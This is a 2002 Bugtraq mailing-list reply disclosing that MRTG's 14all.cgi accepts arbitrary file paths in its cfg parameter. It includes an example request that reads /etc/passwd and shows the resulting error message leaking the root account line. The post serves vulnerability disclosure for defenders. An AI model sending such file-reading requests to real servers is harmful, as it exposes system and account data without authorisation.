[24233] in bugtraq
Re: Mrtg Path Disclosure Vulnerability
daemon@ATHENA.MIT.EDU (Jason Hicks)
Sun Feb 10 03:48:01 2002
Message-Id: <sc63b65d.098@mail.natfuel.com>
Date: Fri, 08 Feb 2002 11:28:22 -0500
From: "Jason Hicks" <HicksJ@NATFUEL.COM>
To: <Bugtraq@securityfocus.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
Actually, it does not display the webroot directory... it lists the location
where 14all.cgi is configured to look for the config files. In your case that
may be the webroot, but not in mine.
BUT... Better yet, 14all.cgi allows (accepts) path entries in the web
request... (a slight no no)
Example:
http://mrtghost/cgi-bin/14all.cgi?cfg=/etc/passwd
Anyone care to guess what this returns?
}Software error:
}ERROR: CFG Error Unknown Option "root:x:0:0:root:/root" on line 2 or
}above. Check doc/reference.txt for Help
}
}For help, please send mail to the webmaster (x), giving
}this error message and the time and date of the error.
Luckily my /etc/shadow is not readable! :)
Nothing like giving away the first line of _any_ readable file on your system....
Jason Hicks
Network Architect
National Fuel - Buffalo, NY